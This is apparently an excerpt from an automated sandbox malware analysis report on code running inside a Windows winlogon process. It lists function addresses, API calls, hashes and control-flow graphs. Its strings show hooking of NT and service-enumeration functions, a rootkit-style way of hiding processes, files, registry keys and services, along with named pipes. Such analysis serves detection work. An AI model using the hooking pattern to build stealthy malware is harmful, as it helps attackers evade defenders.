                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 3733156554-0
                                                                                                                                                                                                                                                • Opcode ID: 7bd4ffe34fae4658c507964c0034225464d3acd96ef312876d3b1babf7cbfa54
                                                                                                                                                                                                                                                • Instruction ID: da08ccee6737cd7e57eba466047ad7013c8b080749dc1189c21685581aac2f6e
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7bd4ffe34fae4658c507964c0034225464d3acd96ef312876d3b1babf7cbfa54
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2BF01D37658B0880F6329B11E491B8A77A0FB887D9F940111BACD03B69DA3EC1918B82
                                                                                                                                                                                                                                                Function 000001CA7D1B2750 Relevance: 3.2, APIs: 2, Instructions: 187memorylibraryCOMMON
                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                control_flow_graph 265 1ca7d1b2750-1ca7d1b27b8 call 1ca7d1b29e8 * 4 274 1ca7d1b29c6 265->274 275 1ca7d1b27be-1ca7d1b27c1 265->275 277 1ca7d1b29c8-1ca7d1b29e4 274->277 275->274 276 1ca7d1b27c7-1ca7d1b27ca 275->276 276->274 278 1ca7d1b27d0-1ca7d1b27d3 276->278 278->274 279 1ca7d1b27d9-1ca7d1b27fa VirtualAlloc 278->279 279->274 280 1ca7d1b2800-1ca7d1b2820 279->280 281 1ca7d1b2822-1ca7d1b284a 280->281 282 1ca7d1b284c-1ca7d1b2853 280->282 281->281 281->282 283 1ca7d1b28f3-1ca7d1b28fa 282->283 284 1ca7d1b2859-1ca7d1b2866 282->284 285 1ca7d1b29a6-1ca7d1b29c4 283->285 286 1ca7d1b2900-1ca7d1b2915 283->286 284->283 287 1ca7d1b286c-1ca7d1b287e LoadLibraryA 284->287 285->277 286->285 288 1ca7d1b291b 286->288 289 1ca7d1b2880-1ca7d1b288c 287->289 290 1ca7d1b28de-1ca7d1b28e6 287->290 293 1ca7d1b2921-1ca7d1b2935 288->293 294 1ca7d1b28d9-1ca7d1b28dc 289->294 290->287 291 1ca7d1b28e8-1ca7d1b28ed 290->291 291->283 296 1ca7d1b2937-1ca7d1b2948 293->296 297 1ca7d1b2996-1ca7d1b29a0 293->297 294->290 295 1ca7d1b288e-1ca7d1b2891 294->295 301 1ca7d1b2893-1ca7d1b28b9 295->301 302 1ca7d1b28bb-1ca7d1b28cb 295->302 299 1ca7d1b2953-1ca7d1b2957 296->299 300 1ca7d1b294a-1ca7d1b2951 296->300 297->285 297->293 304 1ca7d1b2959-1ca7d1b295f 299->304 305 1ca7d1b2961-1ca7d1b2965 299->305 303 1ca7d1b2984-1ca7d1b2994 300->303 306 1ca7d1b28ce-1ca7d1b28d5 301->306 302->306 303->296 303->297 304->303 308 1ca7d1b2977-1ca7d1b297b 305->308 309 1ca7d1b2967-1ca7d1b2975 305->309 306->294 308->303 310 1ca7d1b297d-1ca7d1b2980 308->310 309->303 310->303
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2638967747.000001CA7D1B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1B0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_1ca7d1b0000_winlogon.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: AllocLibraryLoadVirtual
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 3550616410-0
                                                                                                                                                                                                                                                • Opcode ID: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                                                                                                                                                                                                                • Instruction ID: 7b8c24021299dcb41b8805f87c59f78c8aa839f6b9bd9ac3640d72a9e7300ad4
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D6610233F417E887EB568F159000BADB392FF44B98F988124DE0D07788DA39D85AC782
                                                                                                                                                                                                                                                Function 000001CA7D1E1AC4 Relevance: 3.1, APIs: 2, Instructions: 68sleepCOMMON
                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                  • Part of subcall function 000001CA7D1E1630: GetProcessHeap.KERNEL32 ref: 000001CA7D1E163B
                                                                                                                                                                                                                                                  • Part of subcall function 000001CA7D1E1630: HeapAlloc.KERNEL32 ref: 000001CA7D1E164A
                                                                                                                                                                                                                                                  • Part of subcall function 000001CA7D1E1630: RegOpenKeyExW.ADVAPI32 ref: 000001CA7D1E16BA
                                                                                                                                                                                                                                                  • Part of subcall function 000001CA7D1E1630: RegOpenKeyExW.ADVAPI32 ref: 000001CA7D1E16E7
                                                                                                                                                                                                                                                  • Part of subcall function 000001CA7D1E1630: RegCloseKey.ADVAPI32 ref: 000001CA7D1E1701
                                                                                                                                                                                                                                                  • Part of subcall function 000001CA7D1E1630: RegOpenKeyExW.ADVAPI32 ref: 000001CA7D1E1721
                                                                                                                                                                                                                                                  • Part of subcall function 000001CA7D1E1630: RegCloseKey.ADVAPI32 ref: 000001CA7D1E173C
                                                                                                                                                                                                                                                  • Part of subcall function 000001CA7D1E1630: RegOpenKeyExW.ADVAPI32 ref: 000001CA7D1E175C
                                                                                                                                                                                                                                                  • Part of subcall function 000001CA7D1E1630: RegCloseKey.ADVAPI32 ref: 000001CA7D1E1777
                                                                                                                                                                                                                                                  • Part of subcall function 000001CA7D1E1630: RegOpenKeyExW.ADVAPI32 ref: 000001CA7D1E1797
                                                                                                                                                                                                                                                  • Part of subcall function 000001CA7D1E1630: RegCloseKey.ADVAPI32 ref: 000001CA7D1E17B2
                                                                                                                                                                                                                                                  • Part of subcall function 000001CA7D1E1630: RegOpenKeyExW.ADVAPI32 ref: 000001CA7D1E17D2
                                                                                                                                                                                                                                                • Sleep.KERNEL32 ref: 000001CA7D1E1ADF
                                                                                                                                                                                                                                                • SleepEx.KERNELBASE ref: 000001CA7D1E1AE5
                                                                                                                                                                                                                                                  • Part of subcall function 000001CA7D1E1630: RegCloseKey.ADVAPI32 ref: 000001CA7D1E17ED
                                                                                                                                                                                                                                                  • Part of subcall function 000001CA7D1E1630: RegOpenKeyExW.ADVAPI32 ref: 000001CA7D1E180D
                                                                                                                                                                                                                                                  • Part of subcall function 000001CA7D1E1630: RegCloseKey.ADVAPI32 ref: 000001CA7D1E1828
                                                                                                                                                                                                                                                  • Part of subcall function 000001CA7D1E1630: RegOpenKeyExW.ADVAPI32 ref: 000001CA7D1E1848
                                                                                                                                                                                                                                                  • Part of subcall function 000001CA7D1E1630: RegCloseKey.ADVAPI32 ref: 000001CA7D1E1863
                                                                                                                                                                                                                                                  • Part of subcall function 000001CA7D1E1630: RegOpenKeyExW.ADVAPI32 ref: 000001CA7D1E1883
                                                                                                                                                                                                                                                  • Part of subcall function 000001CA7D1E1630: RegCloseKey.ADVAPI32 ref: 000001CA7D1E189E
                                                                                                                                                                                                                                                  • Part of subcall function 000001CA7D1E1630: RegCloseKey.ADVAPI32 ref: 000001CA7D1E18A8
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2639839393.000001CA7D1E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_1ca7d1e0000_winlogon.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CloseOpen$HeapSleep$AllocProcess
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 1534210851-0
                                                                                                                                                                                                                                                • Opcode ID: 96bbb6c5dfaa89c5ee4f9b47efdaf229a391d86e69f5c9ec07006103e4739bcd
                                                                                                                                                                                                                                                • Instruction ID: a07f805ffae74e0d63d6fdf8c268cb46fa96c110946ffe678857fd558b38d778
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 96bbb6c5dfaa89c5ee4f9b47efdaf229a391d86e69f5c9ec07006103e4739bcd
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 51314477A8470941FA529B22D940BED33B5BF44BC9FD940A18E09876D5FE12C8D183E3

                                                                                                                                                                                                                                                Non-executed Functions

                                                                                                                                                                                                                                                Function 000001CA7D1E2B40 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 264stringlibraryloaderCOMMON
                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                control_flow_graph 496 1ca7d1e2b40-1ca7d1e2bb9 call 1ca7d202d50 499 1ca7d1e2ef4-1ca7d1e2f17 496->499 500 1ca7d1e2bbf-1ca7d1e2bc5 496->500 500->499 501 1ca7d1e2bcb-1ca7d1e2bce 500->501 501->499 502 1ca7d1e2bd4-1ca7d1e2bd7 501->502 502->499 503 1ca7d1e2bdd-1ca7d1e2bed GetModuleHandleA 502->503 504 1ca7d1e2c01 503->504 505 1ca7d1e2bef-1ca7d1e2bff call 1ca7d1f6090 503->505 507 1ca7d1e2c04-1ca7d1e2c22 504->507 505->507 507->499 510 1ca7d1e2c28-1ca7d1e2c47 StrCmpNIW 507->510 510->499 511 1ca7d1e2c4d-1ca7d1e2c51 510->511 511->499 512 1ca7d1e2c57-1ca7d1e2c61 511->512 512->499 513 1ca7d1e2c67-1ca7d1e2c6e 512->513 513->499 514 1ca7d1e2c74-1ca7d1e2c87 513->514 515 1ca7d1e2c89-1ca7d1e2c95 514->515 516 1ca7d1e2c97 514->516 517 1ca7d1e2c9a-1ca7d1e2c9e 515->517 516->517 518 1ca7d1e2ca0-1ca7d1e2cac 517->518 519 1ca7d1e2cae 517->519 520 1ca7d1e2cb1-1ca7d1e2cbb 518->520 519->520 521 1ca7d1e2db1-1ca7d1e2db5 520->521 522 1ca7d1e2cc1-1ca7d1e2cc4 520->522 523 1ca7d1e2ee6-1ca7d1e2eee 521->523 524 1ca7d1e2dbb-1ca7d1e2dbe 521->524 525 1ca7d1e2cd6-1ca7d1e2ce0 522->525 526 1ca7d1e2cc6-1ca7d1e2cd3 call 1ca7d1e19a4 522->526 523->499 523->514 527 1ca7d1e2dc0-1ca7d1e2dcc call 1ca7d1e19a4 524->527 528 1ca7d1e2dcf-1ca7d1e2dd9 524->528 530 1ca7d1e2d14-1ca7d1e2d1e 525->530 531 1ca7d1e2ce2-1ca7d1e2cef 525->531 526->525 527->528 535 1ca7d1e2e09-1ca7d1e2e0c 528->535 536 1ca7d1e2ddb-1ca7d1e2de8 528->536 532 1ca7d1e2d20-1ca7d1e2d2d 530->532 533 1ca7d1e2d4e-1ca7d1e2d51 530->533 531->530 538 1ca7d1e2cf1-1ca7d1e2cfe 531->538 532->533 539 1ca7d1e2d2f-1ca7d1e2d3c 532->539 540 1ca7d1e2d53-1ca7d1e2d5d call 1ca7d1e1bc4 533->540 541 1ca7d1e2d5f-1ca7d1e2d6c lstrlenW 533->541 544 1ca7d1e2e19-1ca7d1e2e26 lstrlenW 535->544 545 1ca7d1e2e0e-1ca7d1e2e17 call 1ca7d1e1bc4 535->545 536->535 543 1ca7d1e2dea-1ca7d1e2df7 536->543 546 1ca7d1e2d01-1ca7d1e2d07 538->546 549 1ca7d1e2d3f-1ca7d1e2d45 539->549 540->541 555 1ca7d1e2da7-1ca7d1e2dac 540->555 551 1ca7d1e2d6e-1ca7d1e2d78 541->551 552 1ca7d1e2d8f-1ca7d1e2da1 call 1ca7d1e3858 541->552 553 1ca7d1e2dfa-1ca7d1e2e00 543->553 547 1ca7d1e2e28-1ca7d1e2e32 544->547 548 1ca7d1e2e49-1ca7d1e2e53 call 1ca7d1e3858 544->548 545->544 564 1ca7d1e2e5e-1ca7d1e2e69 545->564 546->555 556 1ca7d1e2d0d-1ca7d1e2d12 546->556 547->548 557 1ca7d1e2e34-1ca7d1e2e47 call 1ca7d1e1534 547->557 558 1ca7d1e2e56-1ca7d1e2e58 548->558 549->555 559 1ca7d1e2d47-1ca7d1e2d4c 549->559 551->552 562 1ca7d1e2d7a-1ca7d1e2d8d call 1ca7d1e1534 551->562 552->555 552->558 563 1ca7d1e2e02-1ca7d1e2e07 553->563 553->564 555->558 556->530 556->546 557->548 557->564 558->523 558->564 559->533 559->549 562->552 562->555 563->535 563->553 569 1ca7d1e2ee0-1ca7d1e2ee4 564->569 570 1ca7d1e2e6b-1ca7d1e2e6f 564->570 569->523 574 1ca7d1e2e77-1ca7d1e2e91 call 1ca7d1f5090 570->574 575 1ca7d1e2e71-1ca7d1e2e75 570->575 577 1ca7d1e2e94-1ca7d1e2e97 574->577 575->574 575->577 580 1ca7d1e2e99-1ca7d1e2eb7 call 1ca7d1f5090 577->580 581 1ca7d1e2eba-1ca7d1e2ebd 577->581 580->581 581->569 583 1ca7d1e2ebf-1ca7d1e2edd call 1ca7d1f5090 581->583 583->569
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2639839393.000001CA7D1E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_1ca7d1e0000_winlogon.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                                                                                                                                                                                                                                                • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                                                                                                                                                                                                                                • API String ID: 2119608203-3850299575
                                                                                                                                                                                                                                                • Opcode ID: 26544e6c5f0419fcfe813128afc281aff9572a7b63f13a5f121835e5e6e69d00
                                                                                                                                                                                                                                                • Instruction ID: 555bc39b5e6f9ab1c6164b41ac2929c36f064cfbafa2d1fd9315a83b4d649197
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 26544e6c5f0419fcfe813128afc281aff9572a7b63f13a5f121835e5e6e69d00
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A8B18073A9179881FB6A8F25D410BE973A4FF44B89F94505AEE0953794DE36CC80C3C2
                                                                                                                                                                                                                                                Function 000001CA7D1E7D90 Relevance: 10.6, APIs: 7, Instructions: 71COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2639839393.000001CA7D1E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_1ca7d1e0000_winlogon.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 3140674995-0
                                                                                                                                                                                                                                                • Opcode ID: 7dccb9baa4819195bc910d82c93c9c94a074eef8dbf9c6936f7d6f4099627f79
                                                                                                                                                                                                                                                • Instruction ID: 938f5b669ad8451808081d637da5d7242c60a325c1498bc33c5ba135558a0bfe
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7dccb9baa4819195bc910d82c93c9c94a074eef8dbf9c6936f7d6f4099627f79
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6A317077645B8486FB61CF60E840BED7360FB84708F84402ADA8E47B95EF39C648C752
                                                                                                                                                                                                                                                Function 000001CA7D1ED814 Relevance: 9.1, APIs: 6, Instructions: 83COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2639839393.000001CA7D1E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_1ca7d1e0000_winlogon.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 1239891234-0
                                                                                                                                                                                                                                                • Opcode ID: 8ad7b10046b838cd94577b5e5c393489478853aa225d9b7cfe16be4989e4b7af
                                                                                                                                                                                                                                                • Instruction ID: 271964bf979d0af30ccaa3c2c3b8d9b5bba9c84c70045a5d429a5ec3e4483d15
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8ad7b10046b838cd94577b5e5c393489478853aa225d9b7cfe16be4989e4b7af
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1731A037654B8486FB21CF25E840BDE73A0FB88758F940115EA9D43B99DF39C145CB42
                                                                                                                                                                                                                                                Function 000001CA7D1E12BC Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 120memoryregistrystringCOMMON
                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2639839393.000001CA7D1E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_1ca7d1e0000_winlogon.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                                                                                                                                                                                                                • String ID: d
                                                                                                                                                                                                                                                • API String ID: 2005889112-2564639436
                                                                                                                                                                                                                                                • Opcode ID: 8c63c14dadc595c9770824a5a8628493091718220e8d249dbd43905e110b320b
                                                                                                                                                                                                                                                • Instruction ID: eb6008952899b97b8051d718b82bc20d5bbcb0e0e4275c00c506dc5afe1e136e
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8c63c14dadc595c9770824a5a8628493091718220e8d249dbd43905e110b320b
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9D519EB3A45B8886FB11CF62E44879A77A1FB89F89F844124DE4907719DF3DC445C742
                                                                                                                                                                                                                                                Function 000001CA7D1E1D1C Relevance: 22.8, APIs: 1, Strings: 12, Instructions: 65threadCOMMON
                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2639839393.000001CA7D1E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_1ca7d1e0000_winlogon.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CurrentThread$AddressHandleModuleProc
                                                                                                                                                                                                                                                • String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
                                                                                                                                                                                                                                                • API String ID: 4175298099-1975688563
                                                                                                                                                                                                                                                • Opcode ID: f9a2c3f0e0819997d594a213550735c5682f77fff7d415db42708e4ed7ca13a2
                                                                                                                                                                                                                                                • Instruction ID: 6f307895852f7b786f3821498888c26fba8df4c367dca315da073d0949d63b92
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f9a2c3f0e0819997d594a213550735c5682f77fff7d415db42708e4ed7ca13a2
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4731B676986B4EA0FA06EF65E861FE47321BF4435EFC40057940902161AF7BC68AC3D3
                                                                                                                                                                                                                                                Function 000001CA7D1ED398 Relevance: 18.1, APIs: 12, Instructions: 112COMMONLIBRARYCODE
                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 000001CA7D1ED3A7
                                                                                                                                                                                                                                                • FlsGetValue.KERNEL32(?,?,?,000001CA7D1F0FDB,?,?,?,000001CA7D1F09CC,?,?,?,000001CA7D1ECDBF), ref: 000001CA7D1ED3BC
                                                                                                                                                                                                                                                • FlsSetValue.KERNEL32(?,?,?,000001CA7D1F0FDB,?,?,?,000001CA7D1F09CC,?,?,?,000001CA7D1ECDBF), ref: 000001CA7D1ED3DD
                                                                                                                                                                                                                                                • FlsSetValue.KERNEL32(?,?,?,000001CA7D1F0FDB,?,?,?,000001CA7D1F09CC,?,?,?,000001CA7D1ECDBF), ref: 000001CA7D1ED40A
                                                                                                                                                                                                                                                • FlsSetValue.KERNEL32(?,?,?,000001CA7D1F0FDB,?,?,?,000001CA7D1F09CC,?,?,?,000001CA7D1ECDBF), ref: 000001CA7D1ED41B
                                                                                                                                                                                                                                                • FlsSetValue.KERNEL32(?,?,?,000001CA7D1F0FDB,?,?,?,000001CA7D1F09CC,?,?,?,000001CA7D1ECDBF), ref: 000001CA7D1ED42C
                                                                                                                                                                                                                                                • SetLastError.KERNEL32 ref: 000001CA7D1ED447
                                                                                                                                                                                                                                                • FlsGetValue.KERNEL32(?,?,?,?,?,?,?,000001CA7D1F0FDB,?,?,?,000001CA7D1F09CC,?,?,?,000001CA7D1ECDBF), ref: 000001CA7D1ED47D
                                                                                                                                                                                                                                                • FlsSetValue.KERNEL32(?,?,00000001,000001CA7D1EF23C,?,?,?,?,000001CA7D1EC50F,?,?,?,?,?,000001CA7D1E7AC0), ref: 000001CA7D1ED49C
                                                                                                                                                                                                                                                  • Part of subcall function 000001CA7D1EDC3C: HeapAlloc.KERNEL32 ref: 000001CA7D1EDC91
                                                                                                                                                                                                                                                • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000001CA7D1F0FDB,?,?,?,000001CA7D1F09CC,?,?,?,000001CA7D1ECDBF), ref: 000001CA7D1ED4C4
                                                                                                                                                                                                                                                  • Part of subcall function 000001CA7D1EDCB4: HeapFree.KERNEL32 ref: 000001CA7D1EDCCA
                                                                                                                                                                                                                                                  • Part of subcall function 000001CA7D1EDCB4: GetLastError.KERNEL32 ref: 000001CA7D1EDCD4
                                                                                                                                                                                                                                                • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000001CA7D1F0FDB,?,?,?,000001CA7D1F09CC,?,?,?,000001CA7D1ECDBF), ref: 000001CA7D1ED4D5
                                                                                                                                                                                                                                                • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000001CA7D1F0FDB,?,?,?,000001CA7D1F09CC,?,?,?,000001CA7D1ECDBF), ref: 000001CA7D1ED4E6
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2639839393.000001CA7D1E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_1ca7d1e0000_winlogon.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Value$ErrorLast$Heap$AllocFree
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 570795689-0
                                                                                                                                                                                                                                                • Opcode ID: 0311236df13cff9ddc5faef47bd35e239f24ae7eb6a96a8c603fa91771617960
                                                                                                                                                                                                                                                • Instruction ID: 84a83807c8b1dcbbbab807b3711b196746fe6fff5a948113775e8854d54f3998
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0311236df13cff9ddc5faef47bd35e239f24ae7eb6a96a8c603fa91771617960
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0C414A32B8434881FA5BA7215551BE931427F447AEFDC4724A9364A6D7EE2AD40153C3
                                                                                                                                                                                                                                                Function 000001CA7D1E224C Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 52filethreadCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2639839393.000001CA7D1E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_1ca7d1e0000_winlogon.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
                                                                                                                                                                                                                                                • String ID: \\.\pipe\wzchildproc32$\\.\pipe\wzchildproc64
                                                                                                                                                                                                                                                • API String ID: 2171963597-1908187885
                                                                                                                                                                                                                                                • Opcode ID: 61e9aad5965f0bf4cc9e1225d6c883f067986cfc1e7eceaf874e8f6c664e297a
                                                                                                                                                                                                                                                • Instruction ID: d1bb669c19779ff73fe20c5d30a7fa6afff5cb1ee8683e7e0b0928f54559d9d6
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 61e9aad5965f0bf4cc9e1225d6c883f067986cfc1e7eceaf874e8f6c664e297a
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C4218333A5474483F711CB24F454B9973A1FB897A9F900215DA5903BA8CF7DC549CF42
                                                                                                                                                                                                                                                Function 000001CA7D1EAAF0 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 312COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2639839393.000001CA7D1E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_1ca7d1e0000_winlogon.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                                                                                                                                                                                • String ID: csm$csm$csm
                                                                                                                                                                                                                                                • API String ID: 849930591-393685449
                                                                                                                                                                                                                                                • Opcode ID: 568c55b6c37a7b809f3d2baaff0a03158bf13451ebb28e48a05911c62cbff0d2
                                                                                                                                                                                                                                                • Instruction ID: f31aed1ed36a3af1d3ce0fc3e67529aff71f3cc58c932523fe09cda7a5d9a8e8
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 568c55b6c37a7b809f3d2baaff0a03158bf13451ebb28e48a05911c62cbff0d2
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F8D19D73A407888AFB62DB65E540BDD7BA0FB8578EF800105EE8957B95DB36C481C783
                                                                                                                                                                                                                                                Function 000001CA7D1B9EF0 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 312COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2638967747.000001CA7D1B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1B0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_1ca7d1b0000_winlogon.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                                                                                                                                                                                • String ID: csm$csm$csm
                                                                                                                                                                                                                                                • API String ID: 849930591-393685449
                                                                                                                                                                                                                                                • Opcode ID: 568c55b6c37a7b809f3d2baaff0a03158bf13451ebb28e48a05911c62cbff0d2
                                                                                                                                                                                                                                                • Instruction ID: ca0dda4068cd8d0100fe43f739cbc5f9adb731b21175f4b4e172cd38bb13ad7a
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 568c55b6c37a7b809f3d2baaff0a03158bf13451ebb28e48a05911c62cbff0d2
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 69D18A73A40B488AFB629B65D580BDD77A0FB49B8CF800105EE8D57B96DB76C481C783
                                                                                                                                                                                                                                                Function 000001CA7D1EF904 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117libraryloaderCOMMON
